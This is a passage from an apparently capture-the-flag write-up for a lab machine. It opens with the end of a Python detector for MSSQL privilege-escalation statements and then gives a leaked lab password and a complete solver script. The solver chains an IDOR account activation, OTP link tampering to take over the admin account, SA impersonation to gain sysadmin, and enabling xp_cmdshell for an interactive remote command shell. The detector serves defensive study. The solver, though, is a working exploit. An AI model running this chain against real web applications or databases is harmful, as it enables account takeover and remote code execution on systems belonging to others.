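        r"\bsp_addsrvrolemember\b.*\bsysadmin\b|\bALTER\s+SERVER\s+ROLE\s+sysadmin\s+ADD\b", re.I),
     "critical"),
    ("advanced_options", re.compile(r"\bsp_configure\s+'show advanced options'\s*,\s*'?1'?", re.I), "medium"),
    ("xp_cmdshell_enable", re.compile(r"\bsp_configure\s+'xp_cmdshell'\s*,\s*'?1'?", re.I), "critical"),
    # xp_cmdshell invoked as a procedure: at the start of the statement or after
    # whitespace, ';', '(' or '..'; the quoted name inside sp_configure does not count
    ("xp_cmdshell_exec", re.compile(r"(?:^|[\s;(.])xp_cmdshell\b", re.I), "critical"),
]

# the privilege-escalation sequence from the walkthrough, in the order it must occur
CHAIN = ["impersonation", "sysadmin_grant", "xp_cmdshell_enable", "xp_cmdshell_exec"]


def scan_log(log_text: str) -> List[Dict[str, str]]:
    """Tag every statement that matches a rule; one finding per (statement, rule)."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        text = m.group("text")
        for name, pattern, severity in RULES:
            if pattern.search(text):
                findings.append({"ts": m.group("ts"), "login": m.group("login"),
                                 "rule": name, "severity": severity, "text": text})
    return findings


def escalation_chain(findings: List[Dict[str, str]]) -> bool:
    """True when every CHAIN step appears in order (other statements may sit in between)."""
    pos = 0
    for f in findings:
        if pos < len(CHAIN) and f["rule"] == CHAIN[pos]:
            pos += 1
    return pos == len(CHAIN)


def summarize(findings: List[Dict[str, str]]) -> Dict[str, int]:
    counts: Dict[str, int] = {}
    for f in findings:
        counts[f["severity"]] = counts.get(f["severity"], 0) + 1
    return counts


if __name__ == "__main__":
    hits = scan_log(SAMPLE_LOG)
    for h in hits:
        print(f"{h['ts']} {h['severity']:8} {h['rule']:18} {h['login']}: {h['text'][:60]}")
    print("full escalation chain:", escalation_chain(hits), summarize(hits))
```

A single `sp_configure 'xp_cmdshell'` hit from an application login is already worth an alert; the chain check exists so that the complete sequence can be raised at a higher severity than any one statement.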

<figure><img src="https://945112445-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbrxXzY5PMGua4UW86ukK%2Fuploads%2FtGsGblTB61D5YsdLwZbR%2Fimage.png?alt=media&#x26;token=f9c124da-5b3c-4e88-aceb-c8a9a8b45e21" alt=""><figcaption></figcaption></figure>

IL0v3ErenY3ager is the password; just RunAs with it, guys.

<figure><img src="https://945112445-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbrxXzY5PMGua4UW86ukK%2Fuploads%2FRqQVZMskVbbGlTiMPFBh%2Fimage.png?alt=media&#x26;token=50f7db62-7858-414d-bb82-67d924741ee5" alt=""><figcaption><p>using RunAsCs.exe</p></figcaption></figure>

<figure><img src="https://945112445-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbrxXzY5PMGua4UW86ukK%2Fuploads%2FUp9FkiI5t25vYMeFvoMY%2Fimage.png?alt=media&#x26;token=c4d86f6d-e69a-4ae5-9129-28b1da88f665" alt=""><figcaption></figcaption></figure>

### Solver Python script

```python
import base64
import re
from io import BytesIO

import httpx
from bs4 import BeautifulSoup
from pwn import *
from PIL import Image
from pyzbar.pyzbar import decode

URL = "http://freelancer.htb"
# set to None to talk to the target directly instead of through Burp
PROXY = "http://127.0.0.1:8080"
# change this to debug if you want to see the csrf logger
context.log_level = 'info'


class BaseAPI:
    def __init__(self, url=URL, proxy=PROXY) -> None:
        # one client for every account; the session cookie is passed explicitly per request
        self.c = httpx.Client(base_url=url, proxy=proxy)


class API(BaseAPI):
    def getCsrfToken(self, path):
        # Django needs both the csrftoken cookie and the csrfmiddlewaretoken form field
        if hasattr(self, 'admin_cookies'):
            r = self.c.get(path, cookies={
                'sessionid': self.admin_cookies
            }, follow_redirects=True)
        else:
            r = self.c.get(path)
        # the cookie may have been set on an earlier response, so fall back to the client jar
        self.csrf_token = r.cookies.get("csrftoken") or self.c.cookies.get("csrftoken")
        soup = BeautifulSoup(r.text, "html.parser")
        csrf = soup.find("input", {"name": "csrfmiddlewaretoken"})
        if csrf:
            self.csrf_middleware = csrf["value"]
            debug(f"csrf/{self.csrf_middleware} from path {path}")
        else:
            # some pages only carry the token inside inline javascript
            csrf_value = re.findall(r'csrfmiddlewaretoken: "(.*?)"', r.text)
            if len(csrf_value) >= 1:
                self.csrf_middleware = csrf_value[0]
                debug(f"csrf/{self.csrf_middleware} from path {path}")
            else:
                warn("csrf token/middleware is not found")

    def _login(self, user, password):
        # shared by the freelancer and employer logins; returns the new sessionid
        path = "/accounts/login/"
        self.getCsrfToken(path)
        r = self.c.post(path, data={
            "csrfmiddlewaretoken": self.csrf_middleware,
            "username": user,
            "password": password
        }, cookies={
            "csrftoken": self.csrf_token
        })
        sid = r.cookies.get("sessionid")
        if sid is None:
            error(f"login failed for {user}")   # pwnlib error() raises
        return sid

    def FreelancerLogin(self, user, password):
        self.freelancer_sessionid = self._login(user, password)
        info(f"success login freelancer account {user}:{password}")

    def EmployerLogin(self, user, password):
        self.employer_sessionid = self._login(user, password)
        info(f"success login employer account {user}:{password}")

    def createAccountFreelancer(self, user, passwd):
        path = "/freelancer/register/"
        self.getCsrfToken(path)
        # the security answers are set to the username so they are known later
        self.c.post(path, data={
            "csrfmiddlewaretoken": self.csrf_middleware,
            "username": user,
            "email": f"{user}@gmail.com",
            "first_name": user,
            "last_name": user,
            "address": user,
            "security_q1": user,
            "security_q2": user,
            "security_q3": user,
            "job_title": user,
            "years_of_experience": 33,
            "description": user,
            "password1": passwd,
            "password2": passwd
        }, cookies={
            "csrftoken": self.csrf_token
        })
        self.FreelancerLogin(user, passwd)

    def createAccountEmployer(self, user, passwd):
        path = "/employer/register/"
        self.getCsrfToken(path)
        self.c.post(path, data={
            "csrfmiddlewaretoken": self.csrf_middleware,
            "username": user,
            "email": f"{user}@gmail.com",
            "first_name": user,
            "last_name": user,
            "address": user,
            "security_q1": user,
            "security_q2": user,
            "security_q3": user,
            "company_name": user,
            "password1": passwd,
            "password2": passwd
        }, cookies={
            "csrftoken": self.csrf_token
        }, follow_redirects=False)
        info(f"success create employer account {user}:{passwd}")

    def ActivateAccountIDOR(self, userEmployer, password):
        # the recovery form only checks the security answers of the username we submit,
        # so a logged-in freelancer can activate the (not yet validated) employer account
        path = "/accounts/recovery/"
        self.getCsrfToken(path)
        self.c.post(path, data={
            "csrfmiddlewaretoken": self.csrf_middleware,
            "username": userEmployer,
            "security_q1": userEmployer,
            "security_q2": userEmployer,
            "security_q3": userEmployer,
        }, cookies={
            "sessionid": self.freelancer_sessionid,
            "csrftoken": self.csrf_token
        })
        self.EmployerLogin(userEmployer, password)
        return "success activate employer account through idor account recovery"

    def GetQrCode(self, idTakeover):
        # the QR code holds an OTP login link whose user id is a base64 path segment
        path = "/accounts/otp/qrcode/generate/"
        r = self.c.get(path, cookies={
            "sessionid": self.employer_sessionid
        })
        image = Image.open(BytesIO(r.content))
        qr_codes = decode(image)
        if not qr_codes:
            error("no QR code found in the image")
        for qr_code in qr_codes:
            data = qr_code.data.decode('utf-8')
            match = re.search(r'otp/([^/]+)/', data)
            if match:
                otp_string = match.group(1)
                decoded_otp_string = base64.b64decode(otp_string).decode()
                encoded_idTakeover = base64.b64encode(idTakeover.encode()).decode()
                info(f'changing id for otp {otp_string}:{decoded_otp_string} to {encoded_idTakeover}:{idTakeover}')
                self.adminUrl = data.replace(otp_string, encoded_idTakeover)
                success(f'here the full link {self.adminUrl}, for admin takeover. enjoy it.')
            else:
                error("No match found")

    def LoginAdmin(self):
        r = self.c.get(self.adminUrl)
        self.admin_cookies = r.cookies.get("sessionid") or self.c.cookies.get("sessionid")

    def QuerySqli(self, query):
        path = "/admin/executeRawSql/"
        self.getCsrfToken("/admin")
        return self.c.post(path, data={
            'query': query,
            'csrfmiddlewaretoken': self.csrf_middleware
        }, cookies={
            'sessionid': self.admin_cookies,
            'csrftoken': self.csrf_token
        })

    def BypassXpCmdShell(self):
        self.LoginAdmin()
        info(f'admin cookies : {self.admin_cookies}')
        self.QuerySqli("""EXECUTE AS LOGIN = 'SA'
EXEC sp_addsrvrolemember 'Freelancer_webapp_user', 'sysadmin'""")
        self.QuerySqli("""
-- this turns on advanced options and is needed to configure xp_cmdshell
EXEC sp_configure 'show advanced options', '1'
RECONFIGURE
-- this enables xp_cmdshell
EXEC sp_configure 'xp_cmdshell', '1'
RECONFIGURE
""")

    def RceSqli(self, cmd):
        rows = self.QuerySqli(f"xp_cmdshell '{cmd}'").json().get('result', {}).get('rows', [])
        for row in rows:
            if len(row) >= 1 and row[0] is not None:
                success(row[0])


if __name__ == "__main__":
    api = API()
    api.createAccountFreelancer('replicannormal', '@Hack4you1337')
    api.createAccountEmployer('replicanlw', '@Hack4you1337')
    info(api.ActivateAccountIDOR('replicanlw', '@Hack4you1337'))
    api.GetQrCode(idTakeover='2')
    info('do u want to get the rce automatically through xp_cmdshell? (y/n)')
    isRce = input('> ')
    # `if "y" or "Y" in isRce` is always true; test the answer itself
    if isRce.strip().lower().startswith('y'):
        api.BypassXpCmdShell()
        while True:
            cmd = input('cmd > ')
            api.RceSqli(cmd)
```
